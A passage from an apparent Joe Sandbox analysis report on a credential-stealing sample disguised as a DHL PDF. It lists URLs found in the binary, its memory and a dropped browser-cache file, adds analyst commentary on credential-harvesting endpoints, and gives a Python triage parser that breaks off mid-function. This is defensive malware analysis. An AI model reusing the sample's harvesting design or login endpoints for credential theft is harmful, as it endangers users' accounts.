            Source: vbc.exe, vbc.exe, 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.292999870.0000000009932000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;g
            Source: vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmpString found in binary or memory: https://a.pomf.cat/
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt
            Source: vbc.exe, 0000000B.00000003.298884319.00000000021AE000.00000004.00000001.sdmp, vbc.exe, 0000000B.00000002.302301690.00000000021AA000.00000004.00000001.sdmp, bhvE48A.tmp.11.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://api.taboola.com/1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1res://C:
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/2/79/227/59/931bcbc9-c308-445b-ac87-70a69b051455.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/286x175/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/300x194/2/100/237/97/93b3dc40-172c-479f-bf5a-5d49e8538bf9.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/300x300/2/100/237/97/93b3dc40-172c-479f-bf5a-5d49e8538bf9.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBEB4CB72
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:300
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v19/KFOlCnqEu92Fr1MmEU9fBBc-.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v19/KFOlCnqEu92Fr1MmSU5fBBc-.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v19/KFOmCnqEu92Fr1Mu4mxM.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: bhvE48A.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7064439419818173&output=html&h=250&twa=
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/adview?ai=C4ZZc-r8UXcilEM6E-gaA-YLQCODD_YZVtLCoh4gJ8ui0tf
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
            Source: vbc.exe, 0000000B.00000002.302227733.0000000000AB0000.00000004.00000040.sdmp | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ht66
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/r20190624/r20190131/zrt_lookup.html
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wre
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1561640951&rver=7.0.6730.0&wp=l
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: vbc.exe, 0000000B.00000003.299521539.00000000027CA000.00000004.00000001.sdmp, vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
            Source: vbc.exe | String found in binary or memory: https://login.yahoo.com/config/login
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://mcdp-chidc2.outbrain.com/l?token=c21d6fc334f1b2ec2cf4d2cbc4199764_4535_1561640954843
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://mcdp-chidc2.outbrain.com/l?token=cadd7d1b12e34ff71b0237f3627e8ef3_4535_1561640955067
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://mcdp-chidc2.outbrain.com/l?token=e2c41a910c7be90243b349629cd840b2_4535_1561640955327
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://p.rfihub.com/cm?in=1&pub=345&userid=3011883223893104794
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://pagead2.googlesyndication.com/pub-config/r20160913/ca-pub-7064439419818173.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://pki.goog/repository/0
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://pr-bh.ybp.yahoo.com/sync/msn/0D4108E9D28A6B29364F0561D37B6A29
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://secure.comodo.com/CPS0
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=9a5be529d6034927bda092231704a93b&c=MSN&d=http%3A%2F%2Fwww.msn
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://sync.outbrain.com/cookie-sync?p=medianet&uid=2046425540973639000V10
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20190624/r20110914/abg_lite.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20190624/r20110914/client/m_js_controller.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20190624/r20110914/client/qs_click_protection.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20190624/r20110914/client/window_focus.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://tpc.googlesyndication.com/simgad/1034445299425550758?w=300&h=300
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://widgets.outbrain.com/
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://widgets.outbrain.com/widgetOBUserSync/obUserSync.html
            Source: vbc.exe, 0000000B.00000003.300248743.00000000021AB000.00000004.00000001.sdmp | String found in binary or memory: https://widgets.outbrain.com/widgetOBUserSync/obUserSync.htmlhttp://s.amazon-adsystem.com/x/da2e6c89
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.digicert.com/CPS0
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.globalsign.com/repository/0
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=892565928.1601478348
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/
            Source: vbc.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
            Source: vbc.exe, 0000000B.00000003.299060394.00000000021B4000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/pagead/drt/ui
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js?cb=%2Fr20100101
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd_listener.js?cache=r20110914
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
            Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
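            For triage, the Source column of this list matters more than the URLs themselves. In Joe Sandbox naming, bhvE48A.tmp.11.dr is a file dropped by process 11 (vbc.exe), and its contents are ad-network, CDN, MSN and login.live.com URLs of the kind found in a browser cache or history, which fits the browser-information harvesting flagged in the signature overview. The two strings found in the vbc.exe image itself (https://login.yahoo.com/config/login and https://www.google.com/accounts/servicelogin) never occur in the dropped file and are the kind of hard-coded endpoint a mail/browser credential-recovery component carries. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses finding lines in this layout (the fused "...drString found..." form and the "... | String found ..." form), splits the Source column using the naming convention assumed above (<name>.<pid>.dr for a dropped file, a hex-PID .sdmp memory dump preceded by its process image name, a bare image name for strings in the executable), and separates URLs seen only inside the malware image or its memory from those also present in a dropped file. The sample lines are copied from this report; the embedded-only heuristic is an analyst convention, not a sandbox feature.

```python
"""Triage helper for "String found in binary or memory" findings.

Joe Sandbox source naming assumed here (an assumption of this example):
  <name>.<pid>.dr                                       file dropped by process <pid>
  <pid-hex>.<n>.<n>.<addr>.<prot>.<n>.sdmp              memory dump, preceded by its image name
  <image>.exe                                           string in the executable image itself
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

FINDING_RE = re.compile(
    r"^\s*Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)"
)

# Constructed sample: six lines copied from the report, in both layouts.
SAMPLE_FINDINGS = """\
Source: bhvE48A.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
Source: vbc.exe, 0000000B.00000002.302227733.0000000000AB0000.00000004.00000040.sdmp | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ht66
Source: vbc.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
Source: vbc.exe, 0000000B.00000003.298841917.00000000021A3000.00000004.00000001.sdmp, bhvE48A.tmp.11.dr | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bhvE48A.tmp.11.dr | String found in binary or memory: https://www.google.com/chrome/
"""


def source_pid(token):
    """PID a source token belongs to, or None for a bare image name."""
    if token.endswith(".dr"):
        m = re.search(r"\.(\d+)\.dr$", token)
        return int(m.group(1)) if m else None
    if token.endswith(".sdmp"):
        return int(token.split(".")[0], 16)  # first field is the PID in hex
    return None


def classify_sources(src_field):
    """Split the comma-separated Source column into (kind, pid, token) tuples."""
    tokens = [t.strip() for t in src_field.split(",") if t.strip()]
    out, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if tok.endswith(".dr"):
            out.append(("dropped_file", source_pid(tok), tok))
        elif tok.endswith(".sdmp"):
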